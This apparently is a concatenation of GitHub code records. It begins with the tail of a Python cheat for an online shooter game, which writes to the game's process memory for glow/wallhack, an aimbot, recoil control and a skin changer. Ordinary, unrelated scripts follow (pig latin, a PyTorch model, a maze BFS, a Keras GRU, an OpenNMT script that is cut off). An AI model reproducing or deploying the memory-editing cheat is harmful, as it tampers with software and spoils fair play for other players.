1.0, \"f\")\n write_memory(game, (cleverglowpointer + (cleverinject * 0x38 + 0xC)), 1.0, \"f\")\n write_memory(game, (cleverglowpointer + (cleverinject * 0x38 + 0x10)), 0.7, \"f\")\n write_memory(game, (cleverglowpointer + (cleverinject * 0x38 + 0x24)), True, \"c\")\n write_memory(game, (cleverglowpointer + (cleverinject * 0x38 + 0x25)), False, \"c\")\n write_memory(game, (cleverglowpointer + (cleverinject * 0x38 + 0x26)), False, \"c\")\n\n\n if cleverglowhealth > 0 and cleverglowteam == cleverglowteam_enemy:\n cleverinject = read_memory(game,(cleverglowplayer + off_glowindex), \"i\")\n write_memory(game, (cleverglowpointer + (cleverinject * 0x38 + 0x4)), 1.0, \"f\")\n write_memory(game, (cleverglowpointer + (cleverinject * 0x38 + 0x8)), 1.0, \"f\")\n write_memory(game, (cleverglowpointer + (cleverinject * 0x38 + 0xC)), 1.0, \"f\")\n write_memory(game, (cleverglowpointer + (cleverinject * 0x38 + 0x10)), 0.7, \"f\")\n write_memory(game, (cleverglowpointer + (cleverinject * 0x38 + 0x24)), True, \"c\")\n write_memory(game, (cleverglowpointer + (cleverinject * 0x38 + 0x25)), False, \"c\")\n write_memory(game, (cleverglowpointer + (cleverinject * 0x38 + 0x26)), False, \"c\")\n\n\ndef normalizeAngles(viewAngleX, viewAngleY):\n if viewAngleX > 89:\n viewAngleX -= 360\n if viewAngleX < -89:\n viewAngleX += 360\n if viewAngleY > 180:\n viewAngleY -= 360\n if viewAngleY < -180:\n viewAngleY += 360\n\n return viewAngleX, viewAngleY\n\n\ndef checkangles(x, y):\n if x > 89:\n return False\n elif x < -89:\n return False\n elif y > 360:\n return False\n elif y < -360:\n return False\n else:\n return True\n\n\ndef nanchecker(first, second):\n if math.isnan(first) or math.isnan(second):\n return False\n else:\n return True\n\n\ndef calc_distance(current_x, current_y, new_x, new_y):\n\n distancex = new_x - current_x\n if distancex < -89:\n distancex += 360\n elif distancex > 89:\n distancex -= 360\n if distancex < 0.0:\n distancex = -distancex\n\n distancey = new_y - current_y\n if distancey < -180:\n distancey += 360\n elif distancey > 180:\n distancey -= 360\n if distancey < 0.0:\n distancey = -distancey\n\n return distancex, distancey\n\n\n\n\n\n\n\n\ndef aimthread():\n oldoffpunchx = 0.0\n oldoffpunchy = 0.0\n while switch:\n if test:\n time.sleep(0.01)\n aimlocalplayer = read_memory(game,(off_clientdll + off_localplayer), \"i\")\n\n aimteam = read_memory(game,(aimlocalplayer + off_teamnum), \"i\")\n enginepointer = read_memory(game,(off_enginedll + off_clientstate), \"i\")\n #print viewanglex\n #print viewangley\n\n\n for y in range(1, 64):\n\n aimplayer = read_memory(game,(off_clientdll + off_entitylist + ((y -1) * 0x10)), \"i\")\n\n\n\n aimplayerteam = read_memory(game,(aimplayer + off_teamnum), \"i\")\n aimplayerhealth = read_memory(game,(aimplayer + off_health), \"i\")\n\n if aimplayerteam != aimteam and aimplayerhealth > 0:\n vecorigin = read_memory(game,(aimlocalplayer + off_vecorigin), \"i\")\n localpos1 = read_memory(game,(aimlocalplayer + off_vecorigin), \"f\") + read_memory(game,(vecorigin + off_vecviewoffset + 0x104), \"f\")\n localpos2 = read_memory(game,(aimlocalplayer + off_vecorigin + 0x4), \"f\") + read_memory(game,(vecorigin + off_vecviewoffset + 0x108), \"f\")\n localpos3 = read_memory(game,(aimlocalplayer + off_vecorigin + 0x8), \"f\") + read_memory(game,(aimlocalplayer + 0x10C), \"f\")\n\n\n\n vecorigin = read_memory(game,(aimplayer + off_vecorigin), \"i\")\n aimplayerbones = read_memory(game,(aimplayer + off_bonematrix), \"i\")\n enemypos1 = read_memory(game,(aimplayerbones + 0x30 * aimbone + 0x0C), \"f\")\n enemypos2 = read_memory(game,(aimplayerbones + 0x30 * aimbone + 0x1C), \"f\")\n enemypos3 = read_memory(game,(aimplayerbones + 0x30 * aimbone + 0x2C), \"f\")\n targetline1 = enemypos1 - localpos1\n targetline2 = enemypos2 - localpos2\n targetline3 = enemypos3 - localpos3\n\n viewanglex = read_memory(game,(enginepointer + off_dwviewangle), \"f\")\n viewangley = read_memory(game,(enginepointer + off_dwviewangle + 0x4), \"f\")\n offpunchx = read_memory(game,(aimlocalplayer + off_aimpunch), \"f\")\n offpunchy = read_memory(game,(aimlocalplayer + off_aimpunch + 0x4), \"f\")\n\n if targetline2 == 0 and targetline1 == 0:\n yaw = 0\n if targetline3 > 0:\n pitch = 270\n else:\n pitch = 90\n else:\n yaw = (math.atan2(targetline2, targetline1) * 180 / math.pi ) - (offpunchy * 2)\n if yaw < 0:\n yaw += 360\n hypotenuse = math.sqrt((targetline1*targetline1) + (targetline2*targetline2) + (targetline3*targetline3))\n pitch = (math.atan2(-targetline3, hypotenuse) * 180 / math.pi) - (offpunchx * 2)\n if pitch < 0:\n pitch += 360\n\n\n pitch, yaw = normalizeAngles(pitch, yaw)\n if checkangles(pitch, yaw):\n\n\n distance_x, distance_y = calc_distance(viewanglex, viewangley, pitch, yaw)\n\n\n if (distance_x < aimfov and distance_y < aimfov and win32api.GetAsyncKeyState(0x14)):\n\n if nanchecker(pitch, yaw):\n\n write_memory(game,(enginepointer + off_dwviewangle), pitch, \"f\")\n write_memory(game,(enginepointer + (off_dwviewangle + 0x4)), yaw, \"f\")\n\n\n\n elif (distance_x < aimfov and distance_y < aimfov and read_memory(game,(aimlocalplayer + off_shotsfired), \"i\") >= 1 and aimonoff) and aimonoff:\n\n if nanchecker(pitch, yaw):\n\n write_memory(game,(enginepointer + off_dwviewangle), pitch, \"f\")\n write_memory(game,(enginepointer + (off_dwviewangle + 0x4)), yaw, \"f\")\n\n\n\n\n\n\n\n\n\n\n\n\ndef recoilsystem():\n oldpunchx = 0.0\n oldpunchy = 0.0\n while switch:\n time.sleep(0.01)\n if rcsonoff:\n\n rcslocalplayer = read_memory(game,(off_clientdll +off_localplayer), \"i\")\n rcsengine = read_memory(game,(off_enginedll + off_clientstate), \"i\")\n if read_memory(game,(rcslocalplayer + off_shotsfired), \"i\") > 2:\n\n rcs_x = read_memory(game,(rcsengine + off_dwviewangle), \"f\")\n rcs_y = read_memory(game,(rcsengine + off_dwviewangle + 0x4), \"f\")\n\n punchx = read_memory(game,(rcslocalplayer + off_aimpunch), \"f\")\n punchy = read_memory(game,(rcslocalplayer + off_aimpunch + 0x4), \"f\")\n\n newrcsx = rcs_x - (punchx - oldpunchx) * 2.0\n newrcsy = rcs_y - (punchy - oldpunchy) * 2.0\n newrcs, newrcy = normalizeAngles(newrcsx, newrcsy)\n\n\n\n\n oldpunchx = punchx\n oldpunchy = punchy\n\n\n\n if nanchecker(newrcsx, newrcsy) and checkangles(newrcsx, newrcsy):\n\n write_memory(game,(rcsengine + off_dwviewangle), newrcsx, \"f\")\n write_memory(game,(rcsengine + off_dwviewangle + 0x4), newrcsy, \"f\")\n\n\n\n else:\n oldpunchx = 0.0\n oldpunchy = 0.0\n newrcsx = 0.0\n newrcsy = 0.0\n\n\n\ndef skinchanger():\n while switch:\n time.sleep(0.01)\n if win32api.GetAsyncKeyState(0x2D):\n knifeengine = read_memory(game,(off_enginedll + off_clientstate), \"i\")\n knifeplayer = read_memory(game, (off_clientdll + off_localplayer), \"i\")\n current_weapon = read_memory(game, (knifeplayer + off_activeweapon), \"i\")\n current_weapon &= 0xFFF\n weapon_entity = read_memory(game, (off_clientdll + off_entitylist + (current_weapon -1) * 0x10), \"i\")\n currentweapon = read_memory(game, (weapon_entity + off_weaponid), \"i\")\n currentskinid = read_memory(game, (weapon_entity + off_fallbackpaintkit), \"i\")\n\n write_memory(game,(weapon_entity + off_itemidhigh), 0, \"i\")\n write_memory(game,(weapon_entity + off_itemidlow), -1, \"i\")\n write_memory(game,(weapon_entity + off_fallbackpaintkit), 474, \"i\")\n write_memory(game,(weapon_entity + off_fallbackwear), 0.000001, \"f\")\n\n\n if currentskinid != read_memory(game, (weapon_entity + off_fallbackpaintkit), \"i\"):\n write_memory(game,(knifeengine + 0x16C), -1, \"i\")\n\n\n\n\n\nthread.start_new_thread(triggerthread, ())\nthread.start_new_thread(bhopthread, ())\nthread.start_new_thread(glowthread, ())\nthread.start_new_thread(cleverglow, ())\nthread.start_new_thread(aimthread, ())\nthread.start_new_thread(recoilsystem, ())\n#thread.start_new_thread(skinchanger, ())\n\n\n\n\n\nprinter()\n\n\nwhile switch:\n if win32api.GetAsyncKeyState(0x37):\n time.sleep(0.2)\n if bhoponoff:\n bhoponoff = False\n else:\n bhoponoff = True\n\n printer()\n\n elif win32api.GetAsyncKeyState(0x38):\n time.sleep(0.2)\n if triggeronoff:\n triggeronoff = False\n else:\n triggeronoff = True\n\n printer()\n\n elif win32api.GetAsyncKeyState(0x39):\n time.sleep(0.2)\n if glowonoff:\n glowonoff = False\n else:\n glowonoff = True\n if cleverglowonoff:\n cleverglowonoff = False\n\n printer()\n\n\n elif win32api.GetAsyncKeyState(0x36):\n time.sleep(0.2)\n if cleverglowonoff:\n cleverglowonoff = False\n else:\n cleverglowonoff = True\n if glowonoff:\n glowonoff = False\n\n printer()\n\n\n elif win32api.GetAsyncKeyState(0x35):\n time.sleep(0.2)\n if rcsonoff:\n rcsonoff = False\n else:\n rcsonoff = True\n\n printer()\n\n\n elif win32api.GetAsyncKeyState(0x28):\n time.sleep(0.2)\n if aimfov > 1.0:\n aimfov -= 0.5\n printer()\n\n\n elif win32api.GetAsyncKeyState(0x26):\n time.sleep(0.2)\n aimfov += 0.5\n printer()\n\n\n elif win32api.GetAsyncKeyState(0x21):\n time.sleep(0.2)\n if aimbone == 8:\n aimbone = 6\n else:\n aimbone = 8\n printer()\n\n\n elif win32api.GetAsyncKeyState(0x22):\n time.sleep(0.2)\n if aimonoff:\n aimonoff = False\n else:\n aimonoff = True\n\n printer()\n\n\n elif win32api.GetAsyncKeyState(0x2E):\n quit()\n\n","repo_name":"adampzb/projekty","sub_path":"tests/letsgo.py","file_name":"letsgo.py","file_ext":"py","file_size_in_byte":26553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24071831152","text":"\n# Converts given string to pig latin and prints it \n# Takes first letter of word, moves it to end and adds 'ay'\n# If word begins with a vowel, simply ends in 'ay'\n# Prints the total number of words along with the number of words starting with vowels\n\n\nwordList = input('Sentences to convert to pig latin: ').lower().split()\nlength = len(wordList)\nprint(' > Number of words: %d\\n' % length)\nvowels = ('a', 'e', 'i', 'o', 'u')\nvoWo = 0\nregW = 0\n\nfor word in wordList:\n if ('.') in word:\n if word[0] in vowels:\n voWo += 1\n vowel_end = word.find('.')\n print(word[:vowel_end] + '-ay.')\n else:\n regW += 1\n normal_end = word.find('.')\n print(word[1:normal_end] + '-' + word[0] + 'ay.')\n else:\n if word[0] in vowels:\n voWo += 1\n print(word + '-ay', end=' ')\n else:\n regW += 1\n print (word[1:] + '-' + word[0] + 'ay', end=' ')\n\nprint('\\n > Number of words beginning with vowel: %d\\n > Number of regular words: %d\\n' % (voWo, regW))\nquit()","repo_name":"galenscovell/Python-Foundations","sub_path":"Algorithms/PigLatin.py","file_name":"PigLatin.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72044547894","text":"import sys, os, math\r\nimport cv2\r\nimport numpy as np\r\nimport pyTimepixAngles as ta\r\n\r\npngImg = None\r\nfinished = False\r\n\r\ndef createController(basePath: str) -> ta.Tpx3DosageMeasurement:\r\n con = ta.Tpx3DosageMeasurement(basePath)\r\n con.setFilterSetup(basePath + \"/FilterSetup.obj\", 256, 256)\r\n return con\r\n\r\ndef initControllerMeas(con: ta.Tpx3DosageMeasurement, basePath: str, qualli: str, angle: float, idx: int, useUnShadowsSource = False):\r\n if useUnShadowsSource == True:\r\n con.SetSimulationFileName(basePath + \"/InData/\" + qualli + \"/noShadow/Data_\" + str(angle) + \".t3pa\")\r\n else:\r\n con.SetSimulationFileName(basePath + \"/InData/\" + qualli + \"/Data_\" + str(angle) + \".t3pa\")\r\n \r\n if con.doDataDrivenMode():\r\n print(\"\\nStarted Data driven mode: \" + str(angle) + \"!\");\r\n\r\ndef getImgAt(basePath: str, qualli: str, degree: float, frameNumber: int):\r\n p = basePath + \"/outImgs/\"+ qualli +\"/img_\" + \"{:10.6f}\".format(degree) + \"_(\" + str(frameNumber) + \").png\"\r\n print(\"Try read: \" + p)\r\n return cv2.imread(p)\r\n\r\ndef onCalcFinished(image, angles: ta.FVector3D, shadows: ta.FShadowSetup):\r\n print(\"Calc finished!\")\r\n setup = ta.RadiationAngleReconstructor.getShadowSetup()\r\n angles.X = angles.X * (180.0 / math.pi)\r\n angles.Y = angles.Y * (180.0 / math.pi)\r\n angles.Z = angles.Z * (180.0 / math.pi)\r\n if angles.X == float(\"inf\"):\r\n return\r\n\r\n cp = pngImg.copy()\r\n for s in setup.singleShadows:\r\n cv2.ellipse(cp, cv2.Point(s.getCenterX(), s.getCenterY()), cv2.Size(s.radiusX, s.radiusY), (180.0 / math.pi) * setup.rotationAngle2D, 0, 360, cv2.Scalar(0, 0, 255), 2)\r\n\r\n cv2.imshow(\"Shadows\", cp)\r\n finished = True\r\n\r\nif __name__ == \"__main__\":\r\n print(\"Version: \" + ta.__version__)\r\n\r\n ## Test if we have access to the most basic constructs\r\n coord = ta.katherine_coord_t()\r\n print(coord)\r\n coord.x = 1\r\n print(coord)\r\n assert coord.x == 1\r\n ta.RadiationAngleReconstructor.SetShadowThreshold(1.1)\r\n print(\"ShadowThreshold: \" + str(ta.RadiationAngleReconstructor.GetShadowThreshold()))\r\n assert ta.RadiationAngleReconstructor.GetShadowThreshold() > 1.09 and ta.RadiationAngleReconstructor.GetShadowThreshold() < 1.11\r\n\r\n ## initialize the openCL execution. Devices can be choosen or selected by default\r\n ta.initializeExecutor(False)\r\n\r\n bp = os.path.dirname(sys.argv[0])\r\n q = input(\"Wähle Strahlenqualität (C60/A80)\")\r\n e_in = input(\"Evaluation des controllers(c) oder einzelner module(m)?\")\r\n\r\n if e_in[0] == 'c':\r\n e_in = input(\"Sollen Test Daten(d) oder Bilder(b) ausgewertet werden oder sollen die unverarbeiteten Bilder ausgegeben (o) werden? [bb[x] = bilder bluring mit x radius; bpp = Zeige Wahrscheinlichkeiten aus Bildern und Positionen; bpa = Zeige Wahrscheinlichkeiten aus Bildern und Winkeln]\")\r\n imgPath = bp + \"/outImgs/\" + q\r\n expectedAngles = []\r\n if q == \"C60\":\r\n expectedAngles = [0.0, 10.0, -10.0, 20.0, -20.0, 30.0, -30.0, 35.0, -35.0, 40.0, -40.0, 45.0, -45.0]\r\n ta.RadiationAngleReconstructor.SetShadowThreshold(1.06)\r\n else:\r\n expectedAngles = [0.0]\r\n ta.RadiationAngleReconstructor.SetShadowThreshold(1.06)\r\n\r\n if e_in[0] == 'b':\r\n con = createController(bp)\r\n print(con)\r\n ta.RadiationAngleReconstructor.SetFilterSetup(con.getFilterSetup())\r\n middlePinIdx = con.getFilterSetup().getFilterIndexByName(\"Pin9_Cube.000\")\r\n\r\n bUseYRot = input(\"Should use y-Rotation? (y/n)\") == \"y\"\r\n bRestrictShadows = input(\"Should use shadow border? (y/n)\") == \"y\"\r\n\r\n for i in range(0, len(expectedAngles)):\r\n ta.RadiationAngleReconstructor.SetShadowThreshold(1.07)\r\n ta.RadiationAngleReconstructor.SetMaxThreadCount(48)\r\n ta.RadiationAngleReconstructor.SetPreviousFoundRotation(ta.FVector2D(0,0))\r\n ta.RadiationAngleReconstructor.SetCurrentScore(0)\r\n \r\n pngImg = getImgAt(bp, q, expectedAngles[i - 1], 0)\r\n img = np.zeros([pngImg.shape[0], pngImg.shape[1]], dtype=np.uint8)\r\n img = cv2.cvtColor(pngImg, cv2.COLOR_RGBA2GRAY)\r\n cv2.imshow(\"Read\", img)\r\n cv2.waitKey(1)\r\n\r\n integratedPixels = ta.OCLImage2D()\r\n integratedPixels.setHostPointerMode(ta.EOCLAccessTypes.ATRead)\r\n integratedPixels.setHostPointer(img.data)\r\n integratedPixels.setVariableChanged(True)\r\n\r\n print(\"Start calc of: \" + str(expectedAngles[i - 1]))\r\n rar = ta.RadiationAngleReconstructor(integratedPixels.makeShared())\r\n print(rar)\r\n rar.calcParallelInRayAngle(onCalcFinished)\r\n print(rar)\r\n\r\n cv2.waitKey(5000)\r\n\r\n print(rar)","repo_name":"Centrasis/pyTpx3Angles","sub_path":"examples/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74980346933","text":"from torch import nn\nimport torchvision\nfrom src.utils.utils import batch_tensor, unbatch_tensor\nimport torch\n\nclass Shape_Feature_Extractor(nn.Module):\n def __init__(\n self,\n ):\n super().__init__()\n\n # Model to be used is ResNet 50\n self.model = torchvision.models.resnet50(pretrained=True)\n\n # Get output before fc layer\n self.model = nn.Sequential(*list(self.model.children())[:-1])\n self.Linear1 = nn.Linear(2048, 1024)\n self.ReLU1 = nn.ReLU()\n self.Dropout1 = nn.Dropout(0.2)\n self.Linear2 = nn.Linear(1024, 512)\n self.ReLU2 = nn.ReLU()\n self.Dropout2 = nn.Dropout(0.2)\n self.Linear3 = nn.Linear(512, 79)\n self.log_softmax = nn.LogSoftmax(dim=1)\n\n def forward(self, input):\n B, M, C, H, W = input.shape\n input = batch_tensor(input, dim=1,squeeze=True)\n input = self.model(input)\n input = input.view(B*M, -1)\n input = self.Linear1(input)\n input = self.ReLU1(input)\n input = self.Dropout1(input)\n input = self.Linear2(input)\n input = self.ReLU2(input)\n input = self.Dropout2(input)\n input = self.Linear3(input)\n input = self.log_softmax(input).clone()\n\n input = unbatch_tensor(input, B, dim=1, unsqueeze=True)\n output = torch.max(input, dim=1)[0]\n\n return output.squeeze()\n\n","repo_name":"TheShiningVampire/DDP1","sub_path":"src/models/components/shape_feature_extractor.py","file_name":"shape_feature_extractor.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5631762876","text":"import sys\nsys.stdin = open('input.txt')\nfrom collections import deque\n\n\ndx = [-1, 1, 0, 0]\ndy = [0, 0, -1, 1]\n\ndef bfs(start):\n Q.append(start)\n global result\n\n while Q:\n x, y = Q.popleft()\n for k in range(4):\n nx = x + dx[k]\n ny = y + dy[k]\n\n if 0 <= nx < N and 0 <= ny < N:\n if visited[nx][ny] == 0 and maze[nx][ny] != 1:\n visited[nx][ny] = visited[x][y] + 1\n\n if maze[nx][ny] == 3:\n result = visited[nx][ny] - 1\n return result\n Q.append((nx, ny))\n return result\n\n\nT = int(input())\nfor tc in range(1, T+1):\n N = int(input())\n maze = [list(map(int, input()) for _ in range(N))]\n visited = [[0 for _ in range(N)] for _ in range(N)]\n\n result = 0\n Q = deque()\n\n for i in range(N):\n for j in range(N):\n if maze[i][j] == 2:\n start = (i, j)\n\n print(f'#{tc} {bfs(start)}')\n","repo_name":"Haru-arp/TIL","sub_path":"Algorithm/SWEA/5105_미로의 거리/미로의 거리 2.py","file_name":"미로의 거리 2.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"41369319496","text":"import time\n\nimport keras.models\nimport matplotlib.pyplot as plt\nimport numpy\nfrom keras.layers import Dense, Dropout, Flatten, GRU\nfrom keras.models import Sequential\n\nimport B_Mind\n\n\ndef Boleslaw(\n testSet=0.98,\n l1_size=512,\n l2_size=512,\n l3_size=200,\n l4_size=0,\n l5_size=0,\n l1_activation='relu',\n l2_activation='relu',\n l3_activation='relu',\n l4_activation='relu',\n l5_activation='relu',\n loss='mean_squared_error',\n optimizer='rmsprop',\n metrics=['accuracy'],\n epochs=80,\n validation_split=0.01,\n batch_size=200,\n FILE_NAME='histData/GER30Cash15.csv',\n dropout=0.2,\n histReq=16\n):\n rand = time.time()\n Data = B_Mind.LoadFile(FILE_NAME)\n\n NormData = B_Mind.AddNormData(Data)\n\n Labels, Data = B_Mind.AddIndicatorsAndHist(NormData, histReq)\n train_x, train_y, test_x, test_y = B_Mind.SelectData(Data, Labels, testSet)\n i, j, k = train_x.shape\n # numpy.savetxt(\"data/x_ful.csv\", train_x[100,:,:], delimiter=\",\")\n\n model = Sequential()\n model.add(GRU(l1_size, return_sequences=True, activation=l1_activation, input_shape=(j, k)))\n model.add(Dropout(dropout))\n if l2_size > 0:\n model.add(GRU(l2_size, return_sequences=True, activation=l2_activation))\n model.add(Dropout(dropout))\n # if l3_size>0:\n # \tmodel.add(GRU(l3_size,return_sequences=True,activation=l3_activation))\n # if l4_size>0:\n # \tmodel.add(Dense(l4_size))\n # \tmodel.add(Activation(l4_activation))\n # if l5_size>0:\n # \tmodel.add(Dense(l5_size))\n # \tmodel.add(Activation(l5_activation))\n model.add(Flatten())\n model.add(Dense(1))\n\n callback_early_stopping = keras.callbacks.EarlyStopping(monitor='val_loss',\n patience=5, verbose=1)\n callback_reduce_lr = keras.callbacks.ReduceLROnPlateau(monitor='val_loss',\n factor=0.1,\n min_lr=1e-4,\n patience=0,\n verbose=1)\n callback_tensorboard = keras.callbacks.TensorBoard(log_dir='./Graph', histogram_freq=1, write_graph=True)\n callbacks = [callback_early_stopping,\n callback_tensorboard,\n callback_reduce_lr]\n\n model.compile(loss=loss,\n optimizer=optimizer,\n metrics=metrics)\n history = model.fit(train_x, train_y,\n batch_size=batch_size,\n epochs=epochs,\n verbose=0,\n validation_split=validation_split,\n callbacks=callbacks,\n shuffle=False)\n\n score = model.evaluate(test_x, test_y,\n batch_size=batch_size, verbose=0)\n print('Test score:', score[0])\n print('Test accuracy:', score[1])\n model.summary()\n\n prediction = model.predict(test_x)\n\n i = len(test_y)\n t = numpy.arange(0, i, 1)\n fig, ax = plt.subplots()\n ax.plot(t, test_y, 'b-', t, prediction, 'g-')\n ax.grid()\n plt.show()\n plt.close(\"all\")\n\n\nBoleslaw()\n","repo_name":"BadMojo123/Machine_learning","sub_path":"Simple DNN/Boleslaw2.py","file_name":"Boleslaw2.py","file_ext":"py","file_size_in_byte":3306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"68162224","text":"import pygame\n\nfrom pygame.sprite import Sprite\n\nclass Star(Sprite):\n\tdef __init__(self, ai_game):\n\t\tsuper().__init__()\n\t\tself.screen = ai_game.screen\n\t\t# завантаження зображення\n\t\tself.image = pygame.image.load('images/star.bmp')\n\t\tself.rect = self.image.get_rect()\n\t\t# визначення позиції\n\t\tself.rect.x = self.rect.width\n\t\tself.rect.y = self.rect.height\n\n\t\tself.x = float(self.rect.x)\n","repo_name":"youfree568/new2","sub_path":"star.py","file_name":"star.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"46582044534","text":"def main():\n soma = 0\n while True:\n print(\"CÓDIGO PRODUTO PREÇO (R$)\")\n print(\"H Hamburger 5,50\")\n print(\"C Cheeseburger 6,80\")\n print(\"M Misto Quente 4,50\")\n print(\"A Americano 7,00\")\n print(\"Q Queijo Prato 4,00\")\n print(\"X PARA TOTAL DA CONTA\")\n codigo = input().upper()[0]\n if codigo != 'X':\n if codigo == 'H':\n soma += 5.50\n elif codigo == 'C':\n soma += 6.80\n elif codigo == 'M':\n soma += 4.50\n\n elif codigo == 'A':\n soma += 7.00\n\n elif codigo == 'Q':\n soma += 4.00\n\n elif not codigo in 'H C M A Q':\n print(\"Opção inválida.\")\n\n if codigo == 'X': break\n if soma != 0:\n print(f'{soma:.2f}')\n\nif __name__ == '__main__':\n main()\n","repo_name":"SirLeonardoFerreira/Atividades-ifpi","sub_path":"Atividade 02 - semana 06/questão4_semana6_atividade02_runcodes.py","file_name":"questão4_semana6_atividade02_runcodes.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5400148407","text":"class Solution:\n def combinationSum(self, candidates: List[int], target: int) -> List[List[int]]:\n # bottom up approach\n # we start with one candidate, and keep on adding one candidate after another until\n # sum is either larger than target, in which case, we dont proceed further;\n # or if sum is equal to target, we append the sequence to output.\n \n self.out = []\n def combination(sum_until_now, seq_until_now, index):\n if sum_until_now > target: return\n if sum_until_now == target: \n self.out.append(seq_until_now)\n return\n \n # this is the important part. we ignore the candidates smaller than the last appended candidate in the sequence\n # this naturally sorts the sequence in ascending order. and thus avoids repeating sequences\n for i in range(index, len(candidates)):\n combination(sum_until_now + candidates[i], seq_until_now + [candidates[i]], i)\n \n combination(0, [], 0)\n return self.out\n \n #the other way to solve this is backtracking. we take the target, and keep on substracting candidates, and check if 0\n # is reached and add the sequence into the out\n # we can also use dp to solve\n","repo_name":"gkpani97/Grind75","sub_path":"week 5/b. combination sum LC 39 M.py","file_name":"b. combination sum LC 39 M.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2974777243","text":"# encoding: utf-8\n\nimport os\nimport re\n\nfrom links import auth, config\nfrom links.util import workflow\n\nimport logging\nfrom logging.config import fileConfig\n\nfrom workflow import PasswordNotFound\n\nfileConfig('logging_config.ini')\nlog = logging.getLogger('links')\n\nCOMMAND_PATTERN = re.compile(r'^[^\\w\\s]+', re.UNICODE)\nACTION_PATTERN = re.compile(r'^\\W+', re.UNICODE)\n\n\ndef route(args):\n log.info(u'in route process')\n\n # debug\n # try:\n # workflow().delete_password(config.KC_OAUTH_TOKEN)\n # except PasswordNotFound as e:\n # log.error(e)\n\n handler = None\n command = []\n command_string = ''\n action = 'none'\n\n if args:\n command_string = args[0]\n # log.info('route args')\n # for arg in args:\n # log.info(arg)\n else:\n log.info('route with empty args')\n\n command_string = re.sub(COMMAND_PATTERN, '', command_string)\n command = re.split(r' +', command_string)\n\n if command:\n action = re.sub(ACTION_PATTERN, '', command[0]) or 'none'\n\n if 'about'.find(action) == 0:\n from links.handlers import about\n handler = about\n elif not auth.is_authorized():\n from links.handlers import login\n handler = login\n elif 'logout'.find(action) == 0:\n from links.handlers import logout\n handler = logout\n elif 'moreQuery'.find(action) == 0:\n from links.handlers import query_count\n handler = query_count\n elif 'pref'.find(action) == 0:\n from links.handlers import preferences\n handler = preferences\n elif 'result_count'.find(action) == 0:\n from links.handlers import result_count\n handler = result_count\n\n elif action.find('search') == 0:\n from links.handlers import search\n handler = search\n\n # If the command starts with a space (no special keywords), the workflow\n # creates a new task\n elif not command_string:\n from links.handlers import welcome\n handler = welcome\n\n else:\n from links.handlers import welcome\n handler = welcome\n\n if handler:\n if '--commit' in args:\n modifier = re.search(r'--(alt|cmd|ctrl|fn)\\b', ' '.join(args))\n\n if modifier:\n modifier = modifier.group(1)\n\n handler.commit(command, modifier)\n else:\n handler.filter(command)\n workflow().send_feedback()\n\n","repo_name":"tickstep/alfred-links-workflow","sub_path":"links/handlers/route.py","file_name":"route.py","file_ext":"py","file_size_in_byte":2399,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"23290275949","text":"#!/usr/bin/env python\n\"\"\"Train models.\"\"\"\nimport traceback\n\nimport torch\n\nimport onmt\nimport onmt.opts as opts\nfrom onmt.inputters.inputter import build_dataset_iter, \\\n build_dataset_iter_multiple\nfrom onmt.model_builder import load_test_model\nfrom onmt.utils.logging import init_logger, logger\nfrom onmt.utils.misc import set_random_seed\nfrom onmt.utils.parse import ArgumentParser\n\n\ndef analysis(opt):\n # ArgumentParser.validate_train_opts(opt)\n # ArgumentParser.update_model_opts(opt)\n # ArgumentParser.validate_model_opts(opt)\n\n opt.gpu_ranks = [opt.gpu] if opt.gpu != -1 else []\n\n if opt.gpu != -1 and torch.cuda.is_available(): # case 1 GPU only\n run_single(opt, opt.gpu)\n else: # case only CPU\n run_single(opt, -1)\n\n\ndef _get_parser():\n parser = ArgumentParser(description='analysis.py')\n\n opts.config_opts(parser)\n opts.model_opts(parser)\n opts.analysis_opts(parser)\n return parser\n\n\ndef main():\n parser = _get_parser()\n\n opt = parser.parse_args()\n analysis(opt)\n\n\ndef _tally_parameters(model):\n enc = 0\n dec = 0\n for name, param in model.named_parameters():\n if 'encoder' in name:\n enc += param.nelement()\n else:\n dec += param.nelement()\n return enc + dec, enc, dec\n\n\ndef configure_process(opt, device_id):\n if device_id >= 0:\n torch.cuda.set_device(device_id)\n set_random_seed(opt.seed, device_id >= 0)\n\n\ndef run_single(opt, device_id, batch_queue=None, semaphore=None):\n # NOTE: It's important that ``opt`` has been validated and updated\n # at this point.\n configure_process(opt, device_id)\n init_logger(opt.log_file)\n\n # Build model.\n logger.info('Loading model from %s' % opt.model)\n fields, model, model_opt = load_test_model(opt, opt.model)\n print(model)\n ArgumentParser.update_model_opts(model_opt)\n ArgumentParser.validate_model_opts(model_opt)\n logger.info('Loading vocab from model at %s.' % opt.model)\n\n # Report src and tgt vocab sizes, including for features\n for side in ['src', 'tgt']:\n f = fields[side]\n try:\n f_iter = iter(f)\n except TypeError:\n f_iter = [(side, f)]\n for sn, sf in f_iter:\n if sf.use_vocab:\n logger.info(' * %s vocab size = %d' % (sn, len(sf.vocab)))\n\n n_params, enc, dec = _tally_parameters(model)\n logger.info('encoder: %d' % enc)\n logger.info('decoder: %d' % dec)\n logger.info('* number of parameters: %d' % n_params)\n\n steper = Steper()\n\n trainer = build_trainer(\n opt, device_id, model, fields, steper)\n\n if len(opt.data_ids) > 1:\n train_shards = []\n for train_id in opt.data_ids:\n shard_base = \"train_\" + train_id\n 